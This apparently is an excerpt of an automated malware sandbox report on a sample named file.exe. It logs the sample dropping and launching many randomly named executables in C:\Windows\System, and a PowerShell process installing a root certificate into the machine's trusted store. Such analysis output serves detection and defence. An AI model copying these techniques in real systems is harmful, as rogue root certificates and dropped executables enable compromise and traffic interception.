Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\wJNkgSa.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\bJVoOik.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\tyQdqmC.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\defQfgC.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\VWrcuzM.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\LKurWpq.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\jtnQpnb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\mbSqRHL.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\FGSooXz.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\UqXZtcb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\WCbcoxD.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\imwRXsl.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\nWSykjl.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\eVVPPqR.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\wHnuprt.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\VFkciqc.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\iHSYLud.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\WLWcTVM.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\hEUEsIC.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\Csmwgyb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\xNhRSWh.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\QWtCxan.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\ERbKWDm.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\MwFvbxc.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\vyHGCnK.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\uxMRJKa.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\wkazDeV.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\VHwkuIa.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\sdTevgk.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\bzSbRdi.exe	Jump to behavior

Installs new ROOT certificates

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Drops PE files

Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\kYjPKaN.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\RcAqfwv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PaGFrFU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\OpMgkKg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\MydOwjq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HKdVaSy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FgiIXgf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NyhRMmW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rgBmwKj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\QdDnaqt.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BpqsHCR.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\gKbbPbF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\kFAVWnk.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\roZGxps.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\SAfbgcC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\XWzPvUm.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wkIkkhX.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UQkDiSP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\AQSffhY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uRBSbtU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\YYCxOQh.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rYIlnZs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\XZxtJFw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\dCnJkoQ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BwBweqn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pzbELEW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\qdErmhf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rQJmlSe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\qQyXqOp.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fIqTNJz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WlVmTit.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xAzCYwU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eXUokzg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\IpqVIyY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\oUGjnOU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sabRErB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BwjWQVv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\snZBbmy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eVVPPqR.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\KEULPTl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mgbtojr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UmvuxvA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\Uvtpjkd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NLJeLdM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ORmCcsC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xneUGSK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\KVgdAzq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jYFqRXp.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\XAgYYqB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WTLAzgJ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\whRtinB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wHnuprt.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mXElbHo.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VgNRTsd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DbVBXPi.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uaJCfvY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jAqlPqL.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JKpmIVS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wibjUVa.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\oxCQuSo.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\GmNUXAr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\IofoOIp.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\CWLRJYu.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HnTfvAZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\delwiax.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\EkcZQPq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fylerHE.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VFkciqc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fpHmIIc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\vUKZkjM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\yXkrKHV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VwIvzCk.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VdwdSnC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fyffsXe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\TscCBWf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\iHSYLud.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wJZTVhW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\gCZFmUf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JUxucoT.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\YFzrUDj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bpCJdvZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VGaSwYr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UlGsoAn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uSdaSKW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\YHgRCCe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\YnfMwga.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UExJWUr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PLFTiIe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\EMuPVcI.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xIpouRJ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wpjxcMS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LOvnxUx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wCJLXKb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sXBohAC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ABievJY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PrFZfUv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\MKAkyBP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mKdsHiQ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BNgUfBr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WLWcTVM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ukkpYme.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\hEUEsIC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mWAGJFM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\cLSDHvv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\Csmwgyb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uHZGZjz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jzfTIlb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sOpjlAo.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fWWVlTg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PZXDYlu.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DTREvJC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HeXCeXe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BtXtEfY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sOGcIfs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\SNcreuq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\tRGqWXW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\iIwdGAS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\RlLCkUy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\caYiRYR.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\otCfESI.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\MLxwqET.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xNhRSWh.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZTSJHKb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\YUQTINM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fEOJwwW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ppfNNTX.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PABSWXd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\MCvhdFU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fYMwhpS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ASKjfZy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PUqZmPS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NzANgdB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\hhEeZzN.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\hAOVVjq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\vREuzRr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eLYbCEG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\MgoHIfZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sFwDWFc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jqUGnrw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\usscfzm.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rXBWFEL.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wJNkgSa.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZDeifCM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mEVTdIJ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\XqXHiyf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ajEytdP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PRQFErV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\blOLvcj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JGfFPYZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mZnsuql.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DrKJjXc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JRnaUrS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\IBWzTMA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\iSmvfWm.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bJVoOik.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VExclqz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mtnXczE.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uwKMlqy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\gQbnwXn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\tXVZMjj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\SYLAfii.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uBSPQKP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wWwDsEl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\brplcms.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\tyQdqmC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\zJwJxgA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\RKUSbZV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jkErNHB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rwUXwnj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\gAPrxpM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\GaSDvNs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\zYyqoWF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\iJpJhmt.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PdxLXDE.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LYzOvkf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uNQcZEb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ERbKWDm.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\zzbooXY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\QWtCxan.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ltlcnHD.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\tzOEnrH.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FaabrKu.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\SOFlTuM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\RtRmRJz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\SxjZpBy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LPMtFlZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pPLiGBV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\dmPtXnK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\QZBRXHU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ssUJwoR.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ndpwHPZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\lQcYvMS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VPuwqFY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ihDRfqA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sctmwAr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uJEYoyF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\defQfgC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\XJEUdeq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rKZvlov.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VWrcuzM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\KVTiBjz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sPniyBl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wsmNUVo.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\lrIaMFU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LKurWpq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HUohYxb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\MwFvbxc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\StIsyPE.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WOvgLKK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xsirwHn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ffPPQcz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\cVJdttA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VLekFWd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\CpMhLMx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FGUHzJz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NuxBytj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\gXwIlxx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HNocQDn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ftWkAMN.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\nJFWveO.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rfpCYxf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xZqqKxJ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UiAsnNy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HEPcUok.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fXSZuyj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ArNQyZf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\hAjIjRa.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rDRaLhy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UyqOZIb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rTrjeti.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\AONeoTK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\RgcKJVt.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\gPTriDK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bymvMyH.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\XBXKJRi.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\osHoaGO.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eQlnkhq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LNyWtrn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZlvPlxy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xVIixqx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JCZRmvQ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sHbEZkY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rVmcjTa.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\aIuDozC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DtVOaSb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\RCVCpIi.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\vyHGCnK.exe	Jump to dropped file
